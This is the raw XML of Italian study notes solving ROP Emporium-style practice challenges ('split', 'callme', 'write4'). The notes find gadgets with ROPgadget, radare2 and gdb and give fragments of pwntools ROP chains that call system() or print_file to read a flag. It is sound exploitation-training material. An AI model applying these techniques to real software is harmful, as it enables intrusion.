    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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Piazzando un break sul main, possiamo notare che la chiamata alla shell viene passata tramite RDX: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L’idea potrebbe essere quella di sfruttare il codice che è già presente e spostare in cima ai registri chiamati (secondo le convenzioni x64) a RDI. Possiamo effettuare una chiamata in base all’offset di quel registro, per poi chiamare correttamente la shell; in altri termini, un ROP gadget. Ci sono vari modi con cui questo è fattibile, per esempio usiamo ROPgadget (con comando seguente):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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ROPgadget --binary split | grep "rdi"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color w:val="9900ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Un gadget è letteralmente un pezzo di codice assembly che si usa per costruire uno stack su cui chiamare istruzioni ed eseguire modifiche; normalmente, consideriamo istruzioni del tipo pop e terminanti con ret. Troviamo esattamente ciò di cui abbiamo bisogno all’indirizzo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x4007c3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: pop rdi; ret.   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[gadget per pop rdi]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Ora abbiamo bisogno del comando /bin/cat flag.txt (una stringa in questo caso), che sappiamo già esiste da qualche parte nel binario. Questa ci permette di mettere la chiamata in rdi e poi chiamare system().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Possiamo notare che con il comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f~useful [f da sola mostra tutte]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in Radare2 è presente dentro usefulString, la quale disassemblata mostra esattamente quello che ci serve:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:rPr>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(in questo caso)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> px @ obj.usefulString  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[o iz vedi sotto]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Similmente, per trovarlo tra i simboli della sezione .data, possiamo usare il comando </w:t>
      </w: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iz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8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notiamo che la stringa a cui vogliamo saltare è </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00601060 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9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[cat flag.txt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ora abbiamo bisogno dell'indirizzo di system(). Possiamo trovarlo usando il comando di sistema </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p (print)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [in questo caso gdb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] in gdb. Si può notare che sta all’indirizzo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x400560</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dalla lista delle funzioni. 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9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[indirizzo di sistema system]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr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Abbiamo l'indirizzo di system, quindi ora possiamo costruire il nostro script pwntools. Consideriamo che tutti gli indirizzi sono a 32 byte; per garantire l’indirezione correttamente, occorre usarne </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">40</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, in quanto sarebbero 32+8. Costruiamo la nostra ROP chain sotto con pwntools.  (si capisce offset da pwnme)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 struttura della rop chain è:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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offset_padding + pop_rdi_gadget + print_flag_cmd + system_addr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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A volte potrebbe accadere, nella costruzione di catene ROP, che lo stack non sia più allineato a 16 byte.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Come nelle reverse challenges, inseriamo i NOP per allinearci con lo stack; in questo contesto, è come avere un gadget che contiene ret.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  <w:t xml:space="preserve">Per risolvere questo problema, è necessario allineare il puntatore dello stack prima della chiamata a system(), spostandolo di 8 byte. Lo stack pointer (RSP) leggerà quell'indirizzo (che è esattamente 8 byte nell'architettura a 64 bit) e quindi verrà nuovamente allineato correttamente.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creiamo quindi un ROP gadget contenente solo un'istruzione ret. Ad esempio, ne troviamo uno in 0x40053e.</w:t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ROPgadget --binary split | grep "ret"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cerchiamone uno con solo “ret”</w:t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 struttura della rop chain ORA  è:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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offset_padding + pop_rdi_gadget + print_flag_cmd + </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gadget2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + system_addr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr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  <w:t xml:space="preserve"> ROP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'./split'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gadget_pop_rdi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00000000004007c3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print_flag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00601060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gadget2_ret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000000000040053e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400560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gadget_pop_rdi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print_flag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gadget2_ret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  <w:t xml:space="preserve"> ROP2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deadbeefdeadbeef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cafebabecafebabe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d00df00dd00df00d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00400720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callme_two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00400740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callme_three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004006f0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pop_3reg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000000000040093c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pop rdi; pop rsi; pop rdx; ret;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#callme_one        load into   rdi    rsi    rdx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pop_3reg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callme_one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#callme_two            rdi    rsi    rdx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pop_3reg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callme_two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#callme_three          rdi    rsi    rdx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pop_3reg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callme_three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"./callme"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recvuntil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ULTIMA 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Presumiamo che il file da stampare sia proprio la flag. Vediamo già l'indirizzo di sys.imp.print_file, prendiamo nota di questo, poiché lo useremo presto: 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  <w:t xml:space="preserve">Print_file = 0x00400510</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Ora, come possiamo scrivere qualcosa nella memoria? Innanzitutto, dobbiamo trovare una sezione del programma che sia scrivibile. Possiamo ispezionare le sezioni usando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">readelf -S ./nomefile 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mostra l’offset di ciascun simbolodella base della sezione rispetto a cui si trova</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) o il comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iS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che mostra le sezion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i) in radare2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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maggior parte delle sezioni sono semplicemente leggibili. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una buona sezione scrivibile è .data (0x00601028), che viene normalmente utilizzato per memorizzare le variabili. Ispezioniamo cosa c'è dentro. Ha una </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dimensione di 10 byte,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> che potrebbe essere adatta a noi, dal momento che "flag.txt" è lungo 8 byte. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Possiamo ispezionare usando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">px 10 .data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (print hexdump of 10 bytes) e possiamo vedere che la sezione è vuota.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Ora che abbiamo il </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">posto giusto per scrivere la nostra stringa (quindi, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">una mov</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), troviamo un gadget che possa farlo, usiamo ROPgadget e grep, in successione con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROPgadget --binary write4 | grep "mov"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3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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Troviamo mov ptr [r14], r15, che mette ciò che è in r15 all'indirizzo indicato da r14 (0x00400628). Idealmente, metteremo r15 "flag.txt", e in r14 metteremo l'indirizzo dove vogliamo scriverlo, che è 0x00601028 che abbiamo trovato prima.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Trovare un ROP gadget che coinvolga sia r14 che r15, essendo l’indirizzo dove vogliamo spostare la flag” e sovrascrivere correttamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E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ROPgadget --binary write4 | grep "pop"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Infine, abbiamo bisogno del gadget per inserire l'indirizzo della stringa in rdi (quindi della forma pop rdi-ret) [già con il comando di prima]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Similmente, si può lanciare il comando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ROPgadget --binary write4 --ropchain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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[e vengono fuori tutti gli indirizzi presi prima]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Attenzione: anche qui lo stack è disallineato. Occorre quindi prendersi un gadget contenente solo “ret” prima di tutte le altre chiamate e dopo l’offset.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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00400510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print_file@plt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00601028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indirizzo della sezione .data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where_mov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0000000000400628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gadget mov [r14], r15 ; ret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what_flag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"flag.txt"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stringa da scrivere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rop1_r1415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0000000000400690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gadget pop r14 ; pop r15 ; ret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rop2_rdi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0000000000400693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gadget pop rdi ; ret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rop_onlyret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00000000004004e6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gadget ret (riallineamento)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40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ROP chain costruita passo passo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rop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rop_onlyret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allineamento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rop1_r1415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what_flag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r14=.data, r15="flag.txt"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where_mov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scrivi "flag.txt" in .data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rop2_rdi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rdi = indirizzo .data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chiama print_file(.data)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"./write4"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rop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Altro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  <w:t xml:space="preserve"> (gets)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004005c7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72 bytes  perchè 64 bytres per variabili locali e 8 bytes di saved RBP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'./bluff_overflow.exe'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692.7165354330737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exploit2.py" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exploit.py" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exploit.py" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://d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exploit.py" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exploit.py" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exploit.py" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exploit.py" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exploit.py" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://offset.py" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shell-storm.org/shellcod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